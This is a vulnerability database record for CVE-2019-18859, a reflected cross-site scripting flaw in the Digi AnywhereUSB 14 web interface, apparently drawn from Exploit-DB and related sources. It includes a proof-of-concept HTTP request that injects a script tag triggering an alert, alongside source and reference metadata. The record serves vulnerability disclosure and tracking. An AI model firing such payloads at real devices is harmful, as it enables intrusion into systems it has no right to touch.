ID
VAR-E-202001-0214
CVE
| cve_id: | CVE-2019-18859 | Trust: 1.5 |
EDB ID
47914
TITLE
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting. CVE-2019-18859 . webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | digi | model: | anywhereusb | scope: | eq | version: | 14 | Trust: 2.1 |
EXPLOIT
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859
# PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
# Author Website: HTTPS://RNPG.info
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Reflective Cross-Site Scripting
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | xss | Trust: 0.5 |
CREDITS
Raspina Net Pars Group
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 47914 | Trust: 1.6 |
| db: | NVD | id: | CVE-2019-18859 | Trust: 1.5 |
| db: | EDBNET | id: | 102480 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 155926 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-18859 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/47914/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 155926 |
| db: | EXPLOIT-DB | id: | 47914 |
| db: | EDBNET | id: | 102480 |
LAST UPDATE DATE
2022-07-27T09:37:18.746000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 155926 | date: | 2020-01-13T18:17:22 |
| db: | EXPLOIT-DB | id: | 47914 | date: | 2020-01-13T00:00:00 |
| db: | EDBNET | id: | 102480 | date: | 2020-01-13T00:00:00 |